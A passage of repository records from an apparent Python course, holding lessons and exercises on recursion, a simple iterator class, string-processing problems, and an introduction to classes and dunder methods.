`for i in range(xStart,xEnd,step)` is not used instead of line A ???\n\n#### Passing multiple arguments as a dictionary\n\n```python\ndef add_to_db(**details):\n print(details)\n # do other stuffs\n\nadd_to_db(name='kasra',age=22,degree='Bachelor')\n```\n\n# Recursive functions\n\n**example:** power\n\n```python\ndef pow(base,power):\n if power==1:\n return base\n return base*pow(base,power-1)\n```\n\n**example:** again Fibonacci\n```python\ndef fib(n):\n if n<=2:\n return 1\n return fib(n-1)+fib(n-2)\n```\n\n*or...*\n\n```python\ndef fib(n):\n return ([1,1]+[fib(i) for i in range(2,n)]+[fib(n-1)+fib(n-2) for _ in [1] if n>=2])[n]\n```\n\n*or lets make it faster...*\n\n```python\ndef fib(n,series=[1,1]):\n if len(series)>=n:\n return series\n 
series=fib(n-1,series)\n    series.append(series[-1]+series[-2])\n    return series\n```\n" }, { "alpha_fraction": 0.46485820412635803, "alphanum_fraction": 0.4858199656009674, "avg_line_length": 16.255319595336914, "blob_id": "d09b7792d80acaed86921fc47c4128b71f6cb724", "content_id": "b01c6e619bbd94f2b3f20cf90f3cee09b9e1370", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 811, "license_type": "no_license", "max_line_length": 36, "num_lines": 47, "path": "/Session7/Q0.py", "repo_name": "kkasra12/pythonClass981", "src_encoding": "UTF-8", "text": "class iterator:\n    def __init__(self):\n        self.lst=[]\n        self.n=0\n    def add(self,lst):\n        self.lst+=lst\n    def next(self):\n        if self.n==len(self.lst):\n            return None\n        ans=self.lst[self.n]\n        self.n+=1\n        # return self.lst.pop(0)\n        return ans\n\na=iterator()\nb=iterator()\n\nb.add([6,9,1])\nprint(a.add([3,4,5]))\nprint(b)\nprint(a.next())\nprint(a.next())\nprint(a.next())\nprint(a.next())\nprint(b.next())\nprint(b.next())\nprint(b.next())\n\n# class iterator:\n#     def __init__(self):\n#         self.lst=[]\n#     def next(self,lst=[])\n#         self.lst+=lst\n#         if lst==[]:\n#             return self.lst.pop(0)\n#         else:\n#             return None\n#\n#\n# a=iterator()\n# b=iterator()\n#\n# b.next([6,9,1])\n# a.next([3,4,5])\n#\n# a.next()\n" }, { "alpha_fraction": 0.5789473652839661, "alphanum_fraction": 0.5921052694320679, "avg_line_length": 29.399999618530273, "blob_id": "9074aae3e6f620d4f080bc223c2b04e356793f71", "content_id": "ccaf429d9018b03286c46f4f92b69ce1f8bebe34", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 304, "license_type": "no_license", "max_line_length": 59, "num_lines": 10, "path": "/Session9/Q1.py", "repo_name": "kkasra12/pythonClass981", "src_encoding": "UTF-8", "text": "def loop_size(node):\n    visited_nodes={node:0}\n    last_node=node\n    while 1:\n        new_node=last_node.next\n        tmp=visited_nodes.get(new_node,-1)\n        if tmp!=-1:\n            return len(visited_nodes)-tmp\n        visited_nodes.update({new_node:len(visited_nodes)})\n        last_node=new_node\n" }, { "alpha_fraction": 0.649350643157959, "alphanum_fraction": 0.6806156635284424, "avg_line_length": 24.66666603088379, "blob_id": "70a7d5408af09fce816ae9ed691537c83384fa3c", "content_id": "1b0a36bb0b87e26985f42654af73df927c61f601", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2079, "license_type": "no_license", "max_line_length": 185, "num_lines": 81, "path": "/Session2/questions.md", "repo_name": "kkasra12/pythonClass981", "src_encoding": "UTF-8", "text": "# QUESTION0\nBob's space button is broken and is misbehaving: it inserts several space characters instead of one. Write a program to help him with this problem.\n\n**input** is a string containing several consecutive spaces.\n\n**output** Replace these spaces with one single space. Also omit any extra space at the end or start of the string.\n\n#### input0\n```\nHello    my name   is    Bob.\n```\n#### output0\n```\nHello my name is Bob.\n```\n# Question1\nBob wants to know all the file extensions used in his computer, hence he has prepared a list containing all of the files in his computer. 
Now help him to find all extensions and print them out.\n\n**input** is a list of file names (each name in a single line and the last line is empty)\n\n**output** print all extensions:\n- extensions must not be duplicated\n- sort them in alphabetic order\n- separate each item with `--`\n\n#### input0\n> tmp.txt\n>\n> download.jpeg\n>\n> project.DB.first.exe\n>\n\n#### output0\n> txt -- jpeg -- exe\n\n# Question2\nrecently, Bob has studied the [Hamming distance](https://en.wikipedia.org/wiki/Hamming_distance).\nnow he has invented a new distance named Bob distance which works like this:\n- check whether the two strings have the same length or not; answer `-1` if they are not the same length\n- find the two strings' differences\n- sum all indexes which are different (indexes start from 1)\n\n*input* is two strings\n\n*output* is a single number showing the Bob distance\n\n#### input0\n1000111011\\\n1000011110\n\n#### output0\n23\n\n>10+8+5\n\n# Question3\nBob managed to send an essay about his *'Bob distance'* to ISI.\nnow he wants to update his code by changing the indexes:\n **number the indexes as increasing powers of two and sum these new numbers**\n\n#### input0\nkasraaaa\\\njasrraae\n\n#### output0\n145\n\n<table>\n  <tr>\n    <td>k</td><td>a</td><td>s</td><td>r</td><td>a</td><td>a</td><td>a</td><td>a</td>\n  </tr>\n  <tr>\n    <td>j</td><td>a</td><td>s</td><td>r</td><td>r</td><td>a</td><td>a</td><td>e</td>\n  </tr>\n  <tr>\n    <td><b>1</b></td><td>2</td><td>4</td><td>8</td><td><b>16</b></td><td>32</td><td>64</td><td><b>128</b></td>\n\n  </tr>\n</table>\n`1+16+128=145`\n" }, { "alpha_fraction": 0.5801835656166077, "alphanum_fraction": 0.5885528922080994, "avg_line_length": 21.585365295410156, "blob_id": "f2952ba914f6e923041c72c1bffe313f4516ee31", "content_id": "409c84a851478a9838df2337dbf9ae9d1ba3378f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3706, "license_type": "no_license", "max_line_length": 222, "num_lines": 164, "path": "/Session7/README.md", "repo_name": "kkasra12/pythonClass981", "src_encoding": "UTF-8", "text": "# Class (part1)\n\n\nPython is an object oriented programming language.\n\nAlmost everything in Python is an object, with its properties and methods.\n\n**What is a class?**\n\nObjects are an encapsulation of variables and functions into a single entity.\n\n```python\nclass human:\n    name=None\n```\n\n## Instantiating\n```python\nclass human:\n    name=None\n\nperson0=human()\nperson0.name='kasra'\n```\n## Adding Functions:\n```Python\nclass human:\n    name=None\n    def sayHello(self):\n        print(f\"hello ma friend :)\\nMy name is {self.name} I am very polite \\U0001F60C\\n\")\n\nperson0=human()\nperson0.name='kasra'\nperson0.sayHello()\n```\n\n## \\_\\_init__ function\n```Python\nclass human:\n    name=None\n    def __init__(self):\n        print(\"i am new born!!\")\n    def sayHello(self):\n        print(f\"hello ma friend :)\\nMy name is {self.name} I am very polite \\U0001F60C\\n\")\n\nperson0=human()\nprint(\"name changed!\")\nperson0.name='kasra'\nperson0.sayHello()\n```\n\n**Question:** write a function to change the `name`\n\n**init function can have arguments...**\n\n```Python\nclass human:\n    name=None\n    def __init__(self,name):\n        print(\"i am new born!!\")\n        self.name=name\n    def sayHello(self):\n        print(f\"hello ma friend :)\\nMy name is {self.name} I am very polite \\U0001F60C\\n\")\n\nperson0=human('kasra')\nperson0.sayHello()\n```\n\n**Try to make several objects from one class and see the variables' namespaces**\n\n**Question:** Create a class which has these functionalities:\n- this class can be instantiated from a list\n- make a method; whenever the method is called it should return the next object\n\n**Question** think of a pile of numbers that we should check whether they are in the Fibonacci series or not. (**first** most of the numbers are duplicated, **second** make it *fast*)\n\n## Magic Functions or Dunder Functions\n\n[docs for special functions](https://docs.python.org/3/reference/datamodel.html#special-method-names)\n\n- `__lt__(self, other)`\n\n- `__le__(self, other)`\n\n- `__eq__(self, other)`\n\n- `__ne__(self, other)`\n\n- `__gt__(self, other)`\n\n- `__ge__(self, other)`\n\n****\n\n\n- `__getitem__(self, key)`\n\n- `__setitem__(self, key, value)`\n\n- `__contains__(self, item)`\n\n****\n\n- `__add__(self, other)` ==> `+`\n\n- `__sub__(self, other)` ==> `-`\n\n- `__mul__(self, other)` ==> `*`\n\n- `__matmul__(self, other)` ==> `@`\n\n> [pythonDoc](https://docs.python.org/3/reference/expressions.html#binary-arithmetic-operations) says `The @ (at) operator is intended to be used for matrix multiplication. No builtin Python types implement this operator.`\n\n- `__truediv__(self, other)` ==> `/`\n\n- `__floordiv__(self, other)` ==> `//`\n\n- `__mod__(self, other)` ==> `%`\n\n- `__pow__(self, other[, modulo])` ==> `**`\n\n- `__lshift__(self, other)` ==> `<<`\n\n- `__rshift__(self, other)` ==> `>>`\n\n- `__and__(self, other)` ==> `&`\n\n- `__xor__(self, other)` ==> `^`\n\n- `__or__(self, other)` ==> `|`\n\n- `__radd__(self, other)`\n- `__rsub__(self, other)`\n- `__rmul__(self, other)`\n- `__rmatmul__(self, other)`\n- `__rtruediv__(self, other)`\n- `__rfloordiv__(self, other)`\n- `__rmod__(self, other)`\n- `__rpow__(self, other)`\n- `__rlshift__(self, other)`\n- `__rrshift__(self, other)`\n- `__rand__(self, other)`\n- `__rxor__(self, other)`\n- `__ror__(self, other)`\n\n- `__iadd__(self, other)` ==> `+=`\n- `__isub__(self, other)` ==> `-=`\n- `__imul__(self, other)` ==> `*=`\n- `__imatmul__(self, other)` ==> `@=`\n- `__itruediv__(self, other)` ==> `/=`\n- `__ifloordiv__(self, other)` ==> `//=`\n- `__imod__(self, other)` ==> `%=`\n- `__ipow__(self, other[, modulo])` ==> `**=`\n- `__ilshift__(self, other)` ==> `<<=`\n- `__irshift__(self, other)` ==> `>>=`\n- `__iand__(self, other)` ==> `&=`\n- `__ixor__(self, other)` ==> `^=`\n- `__ior__(self, other)` ==> `|=`\n\n****\n\n- `__str__(self)`\n\n- `__len__(self)`\n" } ]
23
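Editor's note: the memoized Fibonacci that closes Session3/README.md in the record above leans on a mutable default argument (`fib(n, series=[1,1])`). Python evaluates that default once, so the same list is shared — and grows — across calls; there the sharing is deliberately the cache, but it often surprises. A small sketch of the conventional `None`-sentinel variant, assuming the same semantics, for cases where a fresh list per call is wanted:

```python
# `def fib(n, series=[1,1])` above shares one list across all calls (that is the
# cache). The sentinel form below gives each top-level call its own fresh list.
def fib(n, series=None):
    if series is None:
        series = [1, 1]
    if len(series) >= n:
        return series
    series = fib(n - 1, series)
    series.append(series[-1] + series[-2])
    return series

print(fib(10))  # [1, 1, 2, 3, 5, 8, 13, 21, 34, 55]
```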
YosofBadr/HackMed
https://github.com/YosofBadr/HackMed
154d9aadf67e50529eac9ce9d6d1e358dd097a9c
b70d2227208a5aac1514931a1cc73ce137f25737
0dfee729e58ee9025c9b471998a48a7b01b36590
refs/heads/master
2021-03-30T23:26:58.798748
2018-03-11T13:38:18
2018-03-11T13:38:18
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6809067130088806, "alphanum_fraction": 0.6918047070503235, "avg_line_length": 47.26881790161133, "blob_id": "d9fc5edfd74b3cac0bbcb0aa72927927d61baf4b", "content_id": "ab72f0763fa276ed6b95cc33eb823204404d76f6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4588, "license_type": "no_license", "max_line_length": 102, "num_lines": 93, "path": "/quizfunctions.py", "repo_name": "YosofBadr/HackMed", "src_encoding": "UTF-8", "text": "import time #import shizzle for the program to work\r\nimport random\r\n\r\n\r\ndef question(MedTypeQ,AskQuestion): #Checks whether to display a medical question or reaction question\r\n if (MedTypeQ==True): #Chooses to display a medical question\r\n MedQuestion()\r\n elif (MedTypeQ==False): #Chooses to display a reaction question\r\n ReactionQuestion(\"Please tap when the tile turns from blue to white\")\r\n \r\n\r\ndef MedQuestion(): #Displays a medical question\r\n MedQBool=True\r\n ReactionQBool=False\r\n \r\n specifyKey=random.sample(list(MedicalQ),1) #Selects a random question from the dictionary\r\n print(specifyKey[0]) #Prints out the selected question\r\n \r\ndef ReactionQuestion(Reactquestion): #Displays a reaction question\r\n ReactQBool=True\r\n MedQBool=False #Tells the program that the question being asked is reaction\r\n \r\n print (Reactquestion) #In this function, tells the user the instruction\r\n time.sleep((randint(2,5))) #Makes the white tile appear randomly, sometimes its 2 seconds...\r\n #sometimes it can be 5 seconds instead, or any seconds between 2 and 5\r\n \r\n print(\"Tap now!\") #Tells the user to tap!\r\n isTileWhite=True #Set to true to signify to the program that the tile is now white\r\n \r\n \r\ndef clickP1(userAnswer): #When Player 1 clicks on button, it comes to this function\r\n if (ReactQBool==True and isTileWhite==True): #If Reaction Q=T, then the only way..\r\n #the question condition can be fulfilled is if the tile was true when the player..\r\n #clicked\r\n player1_score +=1\r\n elif (ReactQBool==True and isTileWhite==False): #Player clicked too early\r\n player1_score -=1\r\n elif (MedQBool==True and userAnswer==(MedicalQ.get(specifyKey[0]))):\r\n player1_score +=1 #Checks the user answer against the actual correct answer\r\n elif (MedQBool==True and userAnswer!=(MedicalQ.get(specifyKey[0]))):\r\n player1_score -=1 #If the answer is incorrect, score is deducted by 1\r\n \r\ndef clickP2(userAnswer): #When Player 2 clicks on button, it comes to this function\r\n if (ReactQBool==True and isTileWhite==True):\r\n player2_score +=1\r\n elif (ReactQBool==True and isTileWhite==False):\r\n player2_score -=1\r\n elif (MedQBool==True and userAnswer==(MedicalQ.get(specifyKey[0]))):\r\n player2_score +=1\r\n elif (MedQBool==True and userAnswer!=(MedicalQ.get(specifyKey[0]))):\r\n player2_score -=1\r\n \r\n\r\n#Program is set to flow in the following order:\r\n #1) Question function is called, for it to decide whether to run...\r\n #a reaction-type question or a medical-type question\r\n \r\n #2) Depending on the choice, one of the respective functions is run\r\n \r\n #3) In the respective function, it sets some booleans to true and some to false...\r\n #This is to signify to the program that the question has been displayed\r\n #This helps the program to differentiate between if player clicked early or not\r\n #i.e. 
(if player clicks on time, that means question boolean was true as it executed)\r\n #however, program detects the player as clicking early if boolean was set to false..\r\n #while they were clicking\r\n \r\n #4) IF the Question has been executed AND the conditions for the question is fulfilled...\r\n #then the player gets a point! If they selected a wrong answer, score - 1\r\n \r\n #5) Then you just loop as many times as you want for your questions\r\n \r\n \r\nplayer1_score=0 #Stores score of player 1\r\nplayer2_score=0; #Stores score of player 2\r\nAskQuestion=\"\" #Declares question variable\r\nMedQBool=False #Set to false because a medical question has not been asked yet\r\nReactQBool=False #Set to false because a reaction question has not been asked yet\r\n\r\nMedTypeQ=False #Declares MedType as false\r\n#This boolean variable is used to understand if the question to be asked is a...\r\n#Reaction question or a medical question\r\n\r\nMedicalQ={\"What is love\":\"Baby don't hurt me\",\"But Wait there's more\":\"hey!\",\"third time!\":\"go go\"}\r\n#A dictionary holding question and answer pairs, so its Question1:Answer1, Question2:Answer2\r\nspecifyKey=\"\" #Variable used to hold the answer for validation later\r\n\r\nisTileWhite=False #Checks whether the tile in Reaction questions has been set to white yet\r\n#This is to verify if the player have clicked before its turned true/tile turned white\r\n#Hence, allowing the program to deduct a score of 1 from the offending player\r\n\r\n\r\n\r\nquestion(True,MedicalQ)\r\n\r\n\r\n\r\n" } ]
1
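The flow comments inside quizfunctions.py above describe detecting early taps with shared boolean flags (`ReactQBool`, `isTileWhite`). A minimal single-player sketch of the same reaction round, measuring the tap delay directly with timestamps — a hypothetical helper, not part of the HackMed repo:

```python
import random
import time

def reaction_round(rng=random.SystemRandom()):
    """Run one reaction question and return the reaction time in seconds."""
    print("Please tap when the tile turns from blue to white")
    time.sleep(rng.randint(2, 5))   # tile turns white after a random 2-5 s wait
    shown_at = time.time()          # timestamp instead of an isTileWhite flag
    input("Tap now! (press Enter) ")
    return time.time() - shown_at
```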
srinivasan-l/PythonTraining2
https://github.com/srinivasan-l/PythonTraining2
c1de9c88277f743625d60c78648b9c176596d251
8d5cbc7664941e2cb69a142830449cb4b5cc5a61
7af1d665c8e54e142cb754e467e20f2a2a3bb1ad
refs/heads/master
2020-03-16T21:07:19.657229
2018-05-11T03:42:46
2018-05-11T03:42:46
132,985,559
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5564236044883728, "alphanum_fraction": 0.5642361044883728, "avg_line_length": 22.040000915527344, "blob_id": "cd9bdafad2489012c0c905dbddcc90617e3a14ef", "content_id": "5fffd6213e3c20fc9be92934a34ab9a3867773fa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1152, "license_type": "no_license", "max_line_length": 69, "num_lines": 50, "path": "/myetree.py", "repo_name": "srinivasan-l/PythonTraining2", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n\"\"\"Process an XML document with elementtree.\n\nShow the document tree.\n\nUsage:\n python elementtree_walk.py [options] infilename\n\"\"\"\n\nimport sys\nfrom xml.etree import ElementTree as etree\n\ndef show_tree(doc):\n root = doc.getroot()\n show_node(root, 0)\n\ndef show_node(node, level):\n show_level(level)\n print 'tag: %s' % (node.tag, )\n for key, value in node.attrib.iteritems():\n show_level(level + 1)\n print '- attribute -- name: %s value: \"%s\"' % (key, value, )\n if node.text:\n text = node.text.strip()\n show_level(level + 1)\n print '- text: \"%s\"' % (node.text, )\n if node.tail:\n tail = node.tail.strip()\n show_level(level + 1)\n print '- tail: \"%s\"' % (tail, )\n for child in node.getchildren():\n show_node(child, level + 1)\n\ndef show_level(level):\n for x in range(level):\n print ' ',\n\ndef test():\n args = sys.argv[1:]\n if len(args) != 1:\n print __doc__\n sys.exit(1)\n docname = args[0]\n doc = etree.parse(docname)\n show_tree(doc)\n\nif __name__ == '__main__':\n #import pdb; pdb.set_trace()\n test()\n" } ]
1
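myetree.py above is Python 2 (`print` statements, `attrib.iteritems()`, the deprecated `getchildren()`). A sketch of the same ElementTree walk ported to Python 3, assuming only the stdlib API:

```python
from xml.etree import ElementTree as etree

def show_node(node, level=0):
    """Print a node's tag, attributes, text and tail, then recurse."""
    indent = '  ' * level
    print('%stag: %s' % (indent, node.tag))
    for key, value in node.attrib.items():          # iteritems() -> items()
        print('%s  - attribute -- name: %s value: "%s"' % (indent, key, value))
    if node.text and node.text.strip():
        print('%s  - text: "%s"' % (indent, node.text.strip()))
    if node.tail and node.tail.strip():
        print('%s  - tail: "%s"' % (indent, node.tail.strip()))
    for child in node:                              # getchildren() -> iteration
        show_node(child, level + 1)

# usage: show_node(etree.parse('doc.xml').getroot())
```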
hzrandd/socketqueue
https://github.com/hzrandd/socketqueue
71e4f3957fe7ffaaaa1c77be6567a2874cf7d4da
cf2a7bc807f25d55e5ccb000a273ff586a31176d
c7c1f0d3d0861e1a334e58f940fd32c2f30b0395
refs/heads/master
2021-01-18T09:29:50.628772
2012-11-10T11:38:37
2012-11-10T11:38:37
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.807692289352417, "alphanum_fraction": 0.807692289352417, "avg_line_length": 25, "blob_id": "2d48b3783510935862f2d96b996e8f31d100f99b", "content_id": "1f63b4c400c9f111cbcd335690e9f72e2f21ed59", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 26, "license_type": "no_license", "max_line_length": 25, "num_lines": 1, "path": "/__init__.py", "repo_name": "hzrandd/socketqueue", "src_encoding": "UTF-8", "text": "from socketqueue import *\n" } ]
1
sfrajaona/number2malagasy
https://github.com/sfrajaona/number2malagasy
8d695ab152c4aab340b21cfa50632dfdea0b8f9e
1d7fd18e94e873f0596be6d574a9028f075b1ff8
ee5d966c012616999d7d076113def0f093647378
refs/heads/master
2020-05-31T20:13:38.076099
2019-06-05T21:33:02
2019-06-05T21:33:02
190,471,554
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.5282312631607056, "alphanum_fraction": 0.5467687249183655, "avg_line_length": 41.30215835571289, "blob_id": "0672ee6d811308430c06a176140a8b1c7871fedb", "content_id": "55c1043c23227740533e721d2a38a57fc03d01fa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5880, "license_type": "no_license", "max_line_length": 100, "num_lines": 139, "path": "/number2malagasy/main.py", "repo_name": "sfrajaona/number2malagasy", "src_encoding": "UTF-8", "text": "\"\"\"\nconvert a number into Malagasy phrase\nconvertit un nombre en Malgache\nmandika ny isa ho lasa soratra amin'ny teny Malagasy\nTODO : - numbers above 9 999 999\n - write tests\n - isa misy faingo\n\"\"\"\nDIGIT_NAME = {'1':'iray', '2':'roa', '3':'telo', '4':'efatra', '5':'dimy',\n '6':'enina', '7':'fito', '8':'valo', '9':'sivy', '0':'aotra'}\nPOWER_OF_TEN = ['amby', 'folo', 'zato', 'arivo', 'alina', 'hetsy', 'tapitrisa']\nDICT_COMBINATION = ({\n ('aotra', 'folo'):\"\", ('iray', 'folo'):'folo',\n ('roa', 'folo'):'roapolo', ('telo', 'folo'):'telopolo',\n ('efatra', 'folo'):'efapolo', ('dimy', 'folo'):'dimapolo',\n ('enina', 'folo'):'enimpolo', ('fito', 'folo'):'fitopolo',\n ('valo', 'folo'):'valopolo', ('sivy', 'folo'):'sivy folo'\n})\nDICT_COMBINATION.update({\n ('aotra', 'zato'):\"\", ('iray', 'zato'):'zato',\n ('roa', 'zato'):'roanjato', ('telo', 'zato'):'telonjato',\n ('efatra', 'zato'):'efajato', ('dimy', 'zato'):'dimanjato',\n ('enina', 'zato'):'eninjato', ('fito', 'zato'):'fitonjato',\n ('valo', 'zato'):'valonjato', ('sivy', 'zato'):'sivinjato'\n})\n\ndef link(word1, word2):\n \"\"\"\n manambatra ny isa sy ny tafolo miaraka aminy\n e.g link('telo', 'zato') --> 'telonjato'\n \"\"\"\n if word1 == 'aotra':\n return ''\n elif word2 == 'amby':\n return word1\n elif (word1, word2) in DICT_COMBINATION:\n return DICT_COMBINATION[word1, word2]\n elif word1 == 'iray' and word2 in ['zato', 'arivo']:\n return word2\n else:\n return word1 + ' ' + word2\n\ndef digit_to_word(number):\n \"\"\"\n convert each digit into the corresponding word\n e.g 291 --> ['roanjato', 'sivy folo', 'iray']\n \"\"\"\n converted = []\n digits = list(str(number)) # oh: 291 --> ['2', '9', '1']\n digits.reverse()\n for i in range(len(digits)):\n digit = digits[i]\n converted += [link(DIGIT_NAME[digit], POWER_OF_TEN[i])]\n return converted\n\ndef combine(digit_words):\n \"\"\"\n combines each digit word into a phrase (RECURSIVELY)\n examples:\n combine(['roa arivo', 'aotra', 'aotra', 'roa']) -> 'roa amby roa arivo' (not 'roa sy roa arivo')\n combine(['roanjato', 'aotra', 'roa']) -> 'roa amby roanjato' (not 'roa sy roa arivo')\n combine(['roanjato', 'roapolo', 'aotra']) -> 'roapolo sy roanjato' (not 'roapolo amby roanjato')\n exceptions:\n 'sy zato' -> 'amby zato'\n 'amby sy x arivo' -> 'amby x arivo' (e.g taona roa amby roa arivo) (when len(digit_words) == 4)\n \"\"\"\n if len(digit_words) == 1:\n phrase = digit_words[0]\n elif len(digit_words) == 2:\n phrase = ''\n if digit_words[0] != '':\n phrase = digit_words[0] + ' amby ' + combine(digit_words[1:])\n else:\n phrase = combine(digit_words[1:])\n return phrase\n elif len(digit_words) > 2:\n if digit_words[-1] != '':\n if not all(p == '' for p in digit_words[1:-1]):\n phrase = combine(digit_words[:-1]) + ' sy ' + digit_words[-1]\n elif all(p == '' for p in digit_words[1:-1]):\n phrase = combine(digit_words[:-1]) + digit_words[-1]\n elif all(p == '' for p in digit_words[1:-1]) and len(digit_words) == 4:\n phrase = combine(digit_words[:-1]) + 
digit_words[-1]\n elif all(p == '' for p in digit_words[1:-1]) and len(digit_words) > 4:\n phrase = combine(digit_words[:-1]) + ' sy ' + digit_words[-1]\n elif digit_words[-1] == '':\n phrase = combine(digit_words[:-1])\n phrase = phrase.replace(' ', ' ')\n phrase = phrase.replace('sy zato', 'amby zato')\n phrase = phrase.replace('iray amby', 'iraika amby')\n return phrase\n\ndef combine_reverse(digit_words):\n \"\"\"\n combines each digit word into a phrase (RECURSIVELY) \n examples:\n combine(['roa arivo', 'aotra', 'aotra', 'roa']) -> 'roa amby roa arivo' (not 'roa sy roa arivo')\n combine(['roanjato', 'aotra', 'roa']) -> 'roa amby roanjato' (not 'roa sy roa arivo')\n combine(['roanjato', 'roapolo', 'aotra']) -> 'roapolo sy roanjato' (not 'roapolo amby roanjato')\n exceptions:\n 'sy zato' -> 'amby zato'\n 'amby sy x arivo' -> 'amby x arivo' (e.g taona roa amby roa arivo) (when len(digit_words) == 4)\n \"\"\"\n if len(digit_words) == 1:\n phrase = digit_words[0]\n elif len(digit_words) == 2:\n phrase = ''\n if digit_words[0] != '':\n phrase = combine_reverse(digit_words[1:]) + ' ' + digit_words[0] + ' amby'\n else:\n phrase = combine_reverse(digit_words[1:])\n return phrase\n elif len(digit_words) > 2:\n if digit_words[-1] != '':\n if not all(p == '' for p in digit_words[1:-1]):\n phrase = digit_words[-1] + ' sy ' + combine_reverse(digit_words[:-1])\n elif all(p == '' for p in digit_words[1:-1]):\n phrase = digit_words[-1] + ' ' + combine_reverse(digit_words[:-1])\n elif all(p == '' for p in digit_words[1:-1]) and len(digit_words) == 4:\n phrase = digit_words[-1] + ' ' + combine_reverse(digit_words[:-1])\n elif all(p == '' for p in digit_words[1:-1]) and len(digit_words) > 4:\n phrase = digit_words[-1] + ' sy ' + combine_reverse(digit_words[:-1])\n elif digit_words[-1] == '':\n phrase = combine_reverse(digit_words[:-1])\n phrase = phrase.replace(' ', ' ')\n phrase = phrase.replace('amby ', 'amby')\n phrase = phrase.replace('iray amby', 'iraika amby')\n return phrase\n\ndef write_in_malagasy(number):\n \"\"\" main function \"\"\"\n return combine(digit_to_word(number)), combine_reverse(digit_to_word(number))\n\nif __name__ == '__main__':\n import sys\n if len(sys.argv) > 1:\n words1, words2 = write_in_malagasy(int(sys.argv[1]))\n print(\"Version 1: \", words1 + '\\n' + \"Version 2: \", words2)\n print(digit_to_word(int(sys.argv[1])))\n" }, { "alpha_fraction": 0.7678571343421936, "alphanum_fraction": 0.7857142686843872, "avg_line_length": 27, "blob_id": "79d44527520500c3b998694315337597bffc6832", "content_id": "fe1f94fcda06d2ad5024ff77f8ecf297b13264ae", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 56, "license_type": "no_license", "max_line_length": 32, "num_lines": 2, "path": "/bin/number2malagasy", "repo_name": "sfrajaona/number2malagasy", "src_encoding": "UTF-8", "text": "#! 
/usr/bin/env python\nfrom number2malagasy import main\n" }, { "alpha_fraction": 0.6491228342056274, "alphanum_fraction": 0.6798245906829834, "avg_line_length": 45.599998474121094, "blob_id": "c4dce0bf4152b1baa52ebf14989d8c82cbe9a3b9", "content_id": "12872c02ee6f9758bbf455e221e41a1c957fa5d7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 228, "license_type": "no_license", "max_line_length": 172, "num_lines": 5, "path": "/tests/test.py", "repo_name": "sfrajaona/number2malagasy", "src_encoding": "UTF-8", "text": "# sketch of the intended test; assumes number2malagasy is importable as a package\nfrom number2malagasy.main import digit_to_word\n\ndef test_digit_to_word():\n    assert digit_to_word(980123) == ['telo','roapolo','zato','','valo alina','sivy hetsy'], \"Should be ['telo','roapolo','zato','','valo alina','sivy hetsy']\"\n" }, { "alpha_fraction": 0.8214285969734192, "alphanum_fraction": 0.8392857313156128, "avg_line_length": 27, "blob_id": "c81fd1fd5831c349a4f43c126ee0f03097a2e651", "content_id": "560cde00de0b5bb4d970194fb7e7727f190e856d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 56, "license_type": "no_license", "max_line_length": 37, "num_lines": 2, "path": "/README.md", "repo_name": "sfrajaona/number2malagasy", "src_encoding": "UTF-8", "text": "# number2malagasy\nconvert a number into Malagasy phrase\n" } ]
4
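The docstrings in number2malagasy/main.py above give per-function examples; a short usage sketch tracing one call through the actual code (run from inside the number2malagasy/ package directory so main.py imports directly — import path assumed):

```python
from main import digit_to_word

# One word per digit, least-significant digit first; zero ('aotra')
# positions collapse to empty strings via link():
print(digit_to_word(980123))
# -> ['telo', 'roapolo', 'zato', '', 'valo alina', 'sivy hetsy']
```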
mjayant/AuthenticationSystem
https://github.com/mjayant/AuthenticationSystem
f03b596c830a3bf3bf19218eca165046ba592f1b
e186f767c989b39d93a49cfa996d18ec78950792
2f074054913d3ee1eaa9efb181cee52c3e238b84
refs/heads/master
2020-12-25T18:52:33.317231
2017-06-27T15:01:55
2017-06-27T15:01:55
94,004,462
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.692307710647583, "alphanum_fraction": 0.692307710647583, "avg_line_length": 39.588233947753906, "blob_id": "17ef42ed4d3a22ce2790c9f579f5f346e641b712", "content_id": "f00d6617bd3d13cc4f56dd436d38a0abf1558586", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 689, "license_type": "no_license", "max_line_length": 76, "num_lines": 17, "path": "/auehentication_system/auehentication_system/urls.py", "repo_name": "mjayant/AuthenticationSystem", "src_encoding": "UTF-8", "text": "from django.conf.urls import include, url\nfrom django.contrib import admin\nfrom .views import redirect_login\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\nurlpatterns = [\n # Examples:\n # url(r'^$', 'auehentication_system.views.home', name='home'),\n # url(r'^blog/', include('blog.urls')),\n url(r'^$', redirect_login, name='redirect_login'),\n url(r'^admin/', include(admin.site.urls)),\n url(r'^auth_sys/', include('autehntication_app.urls')),\n url(r'^post/', include('post_app.urls')),\n #url(r'^accounts/profile/$',views.view_profile, name='view_profile'),\n]\nurlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)" }, { "alpha_fraction": 0.7045977115631104, "alphanum_fraction": 0.7045977115631104, "avg_line_length": 35.29166793823242, "blob_id": "046bdf0442185595c3c92eb3483ad906ce2882e4", "content_id": "b7398830486e4c958d10bb444ee0e482a2aafb82", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 870, "license_type": "no_license", "max_line_length": 140, "num_lines": 24, "path": "/auehentication_system/autehntication_app/middleware.py", "repo_name": "mjayant/AuthenticationSystem", "src_encoding": "UTF-8", "text": "import re\nfrom django.conf import settings\nfrom django.shortcuts import 